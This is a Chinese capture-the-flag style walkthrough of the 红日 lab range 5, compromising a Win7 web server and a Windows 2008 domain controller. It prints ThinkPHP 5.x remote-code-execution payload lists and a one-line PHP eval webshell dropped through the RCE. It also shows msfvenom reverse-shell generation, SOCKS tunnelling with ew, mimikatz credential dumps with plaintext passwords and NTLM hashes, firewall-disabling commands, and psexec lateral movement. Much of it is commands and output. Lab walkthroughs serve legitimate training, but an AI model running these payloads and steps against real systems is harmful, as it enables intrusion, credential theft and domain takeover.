红日靶场5

前言

外网渗透

信息收集

1、arp探测

2、nmap

3、nikto

4、whatweb

5、gobuster

6、dirsearch

漏洞探测

ThinKPHP漏洞

漏洞利用

get shell

内网渗透

信息收集

CS 启动！

CS连接

CS信息收集

1、hashdump

2、猕猴桃

3、端口扫描

MSF启动！

MSF木马生成

MSF监听模块

MSF信息收集

1、添加内网路由

2、引入本地流量

3、密码抓取

4、关闭防火墙

5、get win7

6、get 域控

前言

靶机一共分为两台，一台win7模拟web服务器，一台windows 2008 用来模拟内网环境。win7可被当作跳板机。win7
账号：sun\heart
密码：123.com
win7内域用户登录
账号：Administrator
密码：dc123.comwindows 2008 server
账号：sun\admin 2020.com
密码：2020.com

在打靶之前要先把win7 c盘内的phpstudy打开！win7是双网卡，只需要将自己的nat网卡网段改为同win7一样的网段即可，也就是135！

外网渗透

信息收集

1、arp探测

┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.135.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.135.1   00:50:56:c0:00:08       VMware, Inc.
192.168.135.2   00:50:56:ec:d1:ca       VMware, Inc.
192.168.135.150 00:0c:29:ce:6e:f7       VMware, Inc.
192.168.135.254 00:50:56:e7:9c:50       VMware, Inc.5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.432 seconds (105.26 hosts/sec). 4 responded

2、nmap

端口探测┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.135.150 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-09 09:53 CST
Nmap scan report for 192.168.135.150
Host is up (0.00061s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:CE:6E:F7 (VMware)Nmap done: 1 IP address (1 host up) scanned in 15.45 seconds

信息收集┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -O -A -p 80,3306 192.168.135.150 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-09 10:11 CST
Nmap scan report for 192.168.135.150
Host is up (0.00054s latency).PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.5.38)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 00:0C:29:CE:6E:F7 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 8.1 R1 (96%), Microsoft Windows Phone 7.5 or 8.0 (96%), Microsoft Windows Embedded Standard 7 (96%), Microsoft Windows Server 2008 or 2008 Beta 3 (92%), Microsoft Windows Server 2008 R2 or Windows 8.1 (92%), Microsoft Windows 7 Professional or Windows 8 (92%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (92%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (92%), Microsoft Windows 7 (90%), Microsoft Windows Server 2008 SP1 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hopTRACEROUTE
HOP RTT     ADDRESS
1   0.54 ms 192.168.135.150OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 157.56 seconds

3、nikto

┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.135.150
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.135.150
+ Target Hostname:    192.168.135.150
+ Target Port:        80
+ Start Time:         2024-01-09 10:14:52 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38
+ /: Retrieved x-powered-by header: PHP/5.5.38.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OpenSSL/1.0.2j appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ Apache/2.4.23 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.5.38 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ PHP/5.5 - PHP 3/4/5 and 7.0 are End of Life products without support.

4、whatweb

┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.135.150
WhatWeb report for http://192.168.135.150
Status    : 200 OK
Title     : <None>
IP        : 192.168.135.150
Country   : RESERVED, ZZSummary   : Apache[2.4.23], HTTPServer[Windows (32 bit)][Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38], OpenSSL[1.0.2j], PHP[5.5.38], Script[text/javascript], X-Powered-By[PHP/5.5.38]Detected Plugins:
[ Apache ]The Apache HTTP Server Project is an effort to develop andmaintain an open-source HTTP server for modern operatingsystems including UNIX and Windows NT. The goal of thisproject is to provide a secure, efficient and extensibleserver that provides HTTP services in sync with the currentHTTP standards.Version      : 2.4.23 (from HTTP Server Header)Google Dorks: (3)Website     : http://httpd.apache.org/[ HTTPServer ]HTTP server header string. This plugin also attempts toidentify the operating system from the server header.OS           : Windows (32 bit)String       : Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38 (from server string)[ OpenSSL ]The OpenSSL Project is a collaborative effort to develop arobust, commercial-grade, full-featured, and Open Sourcetoolkit implementing the Secure Sockets Layer (SSL v2/v3)and Transport Layer Security (TLS v1) protocols as well asa full-strength general purpose cryptography library.Version      : 1.0.2jWebsite     : http://www.openssl.org/[ PHP ]PHP is a widely-used general-purpose scripting languagethat is especially suited for Web development and can beembedded into HTML. This plugin identifies PHP errors,modules and versions and extracts the local file path andusername if present.Version      : 5.5.38Version      : 5.5.38Google Dorks: (2)Website     : http://www.php.net/[ Script ]This plugin detects instances of script HTML elements andreturns the script language/type.String       : text/javascript[ X-Powered-By ]X-Powered-By HTTP headerString       : PHP/5.5.38 (from x-powered-by string)HTTP Headers:HTTP/1.1 200 OKDate: Tue, 09 Jan 2024 02:13:06 GMTServer: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38X-Powered-By: PHP/5.5.38Content-Length: 931Connection: closeContent-Type: text/html; charset=utf-8

5、gobuster

┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.135.150 -x php,txt -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.135.150
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 931]
/index.php            (Status: 200) [Size: 931]
/0                    (Status: 200) [Size: 931]
/static               (Status: 301) [Size: 238] [--> http://192.168.135.150/static/]
/add.php              (Status: 200) [Size: 1643]
/Index                (Status: 200) [Size: 931]
/Index.php            (Status: 200) [Size: 931]
/robots.txt           (Status: 200) [Size: 24]
/captcha              (Status: 200) [Size: 1674]
/%20                  (Status: 403) [Size: 210]
/INDEX                (Status: 200) [Size: 931]
/INDEX.php            (Status: 200) [Size: 931]
/Add.php              (Status: 200) [Size: 1643]
===============================================================
Finished
===============================================================

6、dirsearch

┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.135.150 -e* -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _  _  _  _ _|_    v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz
HTTP method: GET | Threads: 25 | Wordlist size: 14594Output File: /root/kali/reports/http_192.168.135.150/_24-01-09_10-16-21.txtTarget: http://192.168.135.150/[10:16:21] Starting:
[10:16:59] 404 -  236B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[10:17:02] 404 -  205B  - /a%5c.aspx
[10:17:10] 200 -    2KB - /add.php
[10:18:42] 200 -    1KB - /favicon.ico
[10:19:37] 200 -   24B  - /robots.txt
[10:19:48] 301 -  238B  - /static  ->  http://192.168.135.150/static/
[10:19:48] 301 -  240B  - /static..  ->  http://192.168.135.150/static../Task Completed

漏洞探测

ThinKPHP漏洞

当我们访问不存在的目录即可获取到框架的版本信息！

漏洞利用

利用searchsploit可以发现利用漏洞！5.0版本存在RCE漏洞！我们利用一下！

payload┌──(root㉿ru)-[~/kali]
└─# searchsploit -m 46150.txtExploit: ThinkPHP 5.X - Remote Command ExecutionURL: https://www.exploit-db.com/exploits/46150Path: /usr/share/exploitdb/exploits/php/webapps/46150.txtCodes: N/AVerified: False
File Type: Unicode text, UTF-8 text
Copied to: /root/kali/46150.txt┌──(root㉿ru)-[~/kali]
└─# cat 46150.txt
# Exploit Title: thinkphp 5.X RCE
# Date: 2019-1-14
# Exploit Author: vr_system
# Vendor Homepage: http://www.thinkphp.cn/
# Software Link: http://www.thinkphp.cn/down.html
# Version: 5.x
# Tested on: windows 7/10
# CVE : Nonehttps://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection1、https://blog.thinkphp.cn/869075
2、https://blog.thinkphp.cn/910675POC：thinkphp 5.0.22
1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
3、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
4、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1thinkphp 5
5、http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1thinkphp 5.0.21
6、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
7、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1thinkphp 5.1.*
8、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
9、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
10、http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
11、http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
12、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
13、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
14、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
15、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd未知版本
16、?s=index/\think\module/action/param1/${@phpinfo()}
17、?s=index/\think\Module/Action/Param/${@phpinfo()}
18、?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
19、index.php?s=/home/article/view_recent/name/1'
header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
20、index.php?s=/home/shopcart/getPricetotal/tag/1%27
21、index.php?s=/home/shopcart/getpriceNum/id/1%27
22、index.php?s=/home/user/cut/id/1%27
23、index.php?s=/home/service/index/id/1%27
24、index.php?s=/home/pay/chongzhi/orderid/1%27
25、index.php?s=/home/pay/index/orderid/1%27
26、index.php?s=/home/order/complete/id/1%27
27、index.php?s=/home/order/complete/id/1%27
28、index.php?s=/home/order/detail/id/1%27
29、index.php?s=/home/order/cancel/id/1%27
30、index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+
31、POST /index.php?s=/home/user/checkcode/ HTTP/1.1
Content-Disposition: form-data; name="couponid"
1') union select sleep('''+str(sleep_time)+''')#thinkphp 5.0.23（完整版）debug模式
32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxxthinkphp 5.0.23(完整版)
33、（post）public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -althhinkphp 5.0.10（完整版）
34、(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system

框架的版本是5.0.22我们利用此版本漏洞thinkphp 5.0.22
1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
3、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
4、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

漏洞利用成功！说明存在此漏洞！我们可以写入木马然后利用蚁剑、冰蝎、菜刀连接！

get shell

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=powershell%20pwd获取当前路径！

paylaodecho "<?php @eval($_POST['shell']);?>" > C:\phpStudy\PHPTutorial\WWW\public\shell.php把木马写到当前路径下的shell.php文件！完整payload
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%22%3C?php%20@eval($_POST[%27shell%27]);?%3E%22%20%3E%20C:\phpStudy\PHPTutorial\WWW\public\shell.php

内网渗透

信息收集

主机是win7外网主机IP：192.168.135.150
内网IP：192.168.138.136那么内网网段就是138DNS是sun.com，DNS服务器的地址是：192.168.138.138

使用arp来查看当前网口的ip地址可以发现138网段内还有内一个ip地址，那么这个IP地址也就是另一台内网主机了！

 尝试ping DNS回显的地址就是域控主机，也就是内网中另一台主机，IP是：192.168.138.138

信息收集的差不多就可以进行下一步了！这里有两种思路！1、使用CS生成木马-监听-拿到shell2、使用msf生成木马--监听--拿到shell

CS 启动！

CS连接

生成一个windows木马文件！

直接拖进去即可！然后直接在命令行中启动即可！

cs就上线成功了！

CS信息收集

记得把会话返回时间改为0

  成功拿到system最高权限啦！

怎么拿到密码呢1、使用cs自带的hashdump2、使用cs自带的猕猴桃 或者直接运行 logonpasswords 也是可以的！

1、hashdump

2、猕猴桃

得到外网主机的账号密码leo  123.comAdministrator  dc123.com   域管理员的账号域是SUN

3、端口扫描

这样利用cs就能获取到内网主机的端口了！

MSF启动！

MSF木马生成

┌──(root㉿ru)-[~/kali]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.135.128 lport=1111 -f exe -o 1.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: 1.exe

MSF监听模块

msf6 exploit(multi/script/web_delivery) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > optionsModule options (exploit/multi/handler):Name  Current Setting  Required  Description----  ---------------  --------  -----------Payload options (generic/shell_reverse_tcp):Name   Current Setting  Required  Description----   ---------------  --------  -----------LHOST                   yes       The listen address (an interface may be specified)LPORT  4444             yes       The listen portExploit target:Id  Name--  ----0   Wildcard TargetView the full module info with the info, or info -d command.msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.135.128
lhost => 192.168.135.128
msf6 exploit(multi/handler) > set lport 1111
lport => 1111
msf6 exploit(multi/handler) > run

生成的木马端口和ip一定要和监听端一样哈！

上传到蚁剑并运行即可反弹shell！

MSF信息收集

1、添加内网路由

前面我们信息收集到，内网ip网段为 192.168.138.0/24

run autoroute -s 192.168.138.0/24   添加内网路由run autoroute -p   查看路由

2、引入本地流量

到这一步，我们就可以先把本地kali流量通过内网穿透工具带到内网！我这里使用ew工具，也可以使用frpc、aliver等！

上传蚁剑 --  运行  -- 建立连接成功./ew_for_linux64 -s rcsocks -l 2222 -e 3333
ew_for_win.exe -s rssocks -d 192.168.135.128 -e 3333rcsocks、rssocks用于反向连接-l：指定本地监听端口
-e：指定转发流量端口
-d：指定连接主机

3、密码抓取

meterpreter > load kiwi
Loading extension kiwi....#####.   mimikatz 2.2.0 20191125 (x64/windows).## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )## \ / ##       > http://blog.gentilkiwi.com/mimikatz'## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )'#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/Success.meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============Username       Domain  LM                                NTLM                              SHA1
--------       ------  --                                ----                              ----
Administrator  SUN     c8c42d085b5e3da2e9260223765451f1  e8bea972b3549868cecd667a64a6ac46  3688af445e35efd8a4d4e0a9eb90b754a2f3a4ee
WIN7$          SUN                                       ad1f7aa2324f0629cc1dd6c9b8321924  38796bed48c38b20b659bf91ccf8a9f8c2ef57ee
leo            SUN     b73a13e9b7832a35aad3b435b51404ee  afffeba176210fad4628f0524bfe1942  fa83a92197d9896cb41463b7a917528b4009c650wdigest credentials
===================Username       Domain  Password
--------       ------  --------
(null)         (null)  (null)
Administrator  SUN     dc123.com
WIN7$          SUN     8a ea 8b 0d 3e c9 83 64 9c 07 24 92 77 40 3f f0 5a bd e0 6f a2 0c ee 22 03 58 02 a4 20 a7 8f fa 8b 55 27 1d b3 a8 ac 4d 67 9c 80 a7 cd 99 8a 09 12 38 3f fd 59 54 77 24 60a0 02 e7 e0 df c0 56 eb 12 fd 7a 80 af 92 2f 88 c7 8c 5c 67 ee 81 68 bd a9 02 ee a9 b4 97 db 52 5d 1e 23 95 e8 94 e3 51 9c 79 81 d4 9f 30 0e 29 0d be 3d 29 95 13 cc f8 fe 97 0e 6c 3e bc 36 98 99 b7 66 7e 9d 98 af d0 e9 f4 14 86 d9 d0 8d 6a 48 e0 6d d6 9d 63 5e 46 b5 e9 de f5 45 05 a3 ea 60 0e de f8 9e 38 e1 53 e3 6c 4b f4 dc 8b 08 31 afb3 b2 30 fb b3 32 78 ba b1 7a 2a 2d 11 f0 67 ee 4a 1a 45 81 53 63 15 b7 4d 78 8c a8 31 c6 51 93 9b 5a c9 0e db 13 f0 dd 39 52 f2 2a 65 37 00 56 ec a7 a0 fe ef 9d 89 46 4fcf f2 9f 8a 90 96 74 ea e9 28 fa 49 ed
leo            SUN     123.comtspkg credentials
=================Username       Domain  Password
--------       ------  --------
Administrator  SUN     dc123.com
leo            SUN     123.comkerberos credentials
====================Username       Domain   Password
--------       ------   --------
(null)         (null)   (null)
Administrator  SUN.COM  dc123.com
leo            SUN.COM  123.com
win7$          SUN.COM  8a ea 8b 0d 3e c9 83 64 9c 07 24 92 77 40 3f f0 5a bd e0 6f a2 0c ee 22 03 58 02 a4 20 a7 8f fa 8b 55 27 1d b3 a8 ac 4d 67 9c 80 a7 cd 99 8a 09 12 38 3f fd 59 54 77 24 60 a0 02 e7 e0 df c0 56 eb 12 fd 7a 80 af 92 2f 88 c7 8c 5c 67 ee 81 68 bd a9 02 ee a9 b4 97 db 52 5d 1e 23 95 e8 94 e3 51 9c 79 81 d4 9f 30 0e 29 0d be 3d 29 95 13 cc f8fe 97 0e 6c 3e bc 36 98 99 b7 66 7e 9d 98 af d0 e9 f4 14 86 d9 d0 8d 6a 48 e0 6d d6 9d 63 5e 46 b5 e9 de f5 45 05 a3 ea 60 0e de f8 9e 38 e1 53 e3 6c 4b f4 dc 8b 08 31af b3 b2 30 fb b3 32 78 ba b1 7a 2a 2d 11 f0 67 ee 4a 1a 45 81 53 63 15 b7 4d 78 8c a8 31 c6 51 93 9b 5a c9 0e db 13 f0 dd 39 52 f2 2a 65 37 00 56 ec a7 a0 fe ef 9d 89 46 4f cf f2 9f 8a 90 96 74 ea e9 28 fa 49 ed

load kiwi  --  getsystem   --  creds_all

得到域管理员以及普通用户的账号以及密码：win7：
Administrator     dc123.com 
leo               123.com

4、关闭防火墙

netsh advfirewall show allprofiles   查看防火墙的状态netsh advfirewall set allprofiles state off   关闭防护墙

5、get win7

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1参数为1：开启服务
参数为0：关闭服务

登录成功！

6、get 域控

我们使用Psexec登录域控在此之前，我们要先关闭防火墙C:\phpStudy\PHPTutorial\WWW\public>net use \\192.168.138.138\ipc$ "1qaz@WSX" /user:"Administrator"
net use \\192.168.138.138\ipc$ "1qaz@WSX" /user:"Administrator"
The command completed successfully.C:\phpStudy\PHPTutorial\WWW\public>sc \\192.168.138.138 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.138.138 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
[SC] CreateService SUCCESSC:\phpStudy\PHPTutorial\WWW\public>sc \\192.168.138.138 start unablefirewall
sc \\192.168.138.138 start unablefirewall
[SC] StartService FAILED 1053:The service did not respond to the start or control request in a timely fashion.C:\phpStudy\PHPTutorial\WWW\public>

使用psexec模块msf6 exploit(windows/smb/psexec) > optionsModule options (exploit/windows/smb/psexec):Name                  Current Setting  Required  Description----                  ---------------  --------  -----------RHOSTS                192.168.138.138  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT                 445              yes       The SMB service port (TCP)SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listingSERVICE_DISPLAY_NAME                   no        The service display nameSERVICE_NAME                           no        The service nameSMBDomain             sun              no        The Windows domain to use for authenticationSMBPass               1qaz@WSX         no        The password for the specified usernameSMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder shareSMBUser               administrator    no        The username to authenticate asPayload options (windows/meterpreter/bind_tcp):Name      Current Setting  Required  Description----      ---------------  --------  -----------EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)LPORT     4444             yes       The listen portRHOST     192.168.138.138  no        The target addressExploit target:Id  Name--  ----0   AutomaticView the full module info with the info, or info -d command.msf6 exploit(windows/smb/psexec) > setg proxies socks5:127.0.0.1:2222
proxies => socks5:127.0.0.1:2222事先开好代理，并把流量带到win7，在使用psexec时，开启全局代理！

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:65dc23a67f31503698981f2665f9d858:::
admin:1000:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
leo:1110:aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942:::
DC$:1001:aad3b435b51404eeaad3b435b51404ee:4062133d1d6015f7f64f9ee1c118eff0:::
WIN7$:1105:aad3b435b51404eeaad3b435b51404ee:ad1f7aa2324f0629cc1dd6c9b8321924:::

ok！拿到两台主机meterpreter之后就算完成靶机的渗透了！权限维持，可以搜一下教程！也很简单！

红日靶场5

前言

外网渗透

信息收集

1、arp探测

2、nmap

3、nikto

4、whatweb

5、gobuster

6、dirsearch

漏洞探测

ThinKPHP漏洞

漏洞利用

get shell

内网渗透

信息收集

CS 启动！

CS连接

CS信息收集

1、hashdump

2、猕猴桃

3、端口扫描

MSF启动！

MSF木马生成

MSF监听模块

MSF信息收集

1、添加内网路由

2、引入本地流量

3、密码抓取

4、关闭防火墙

5、get win7

6、get 域控

相关文章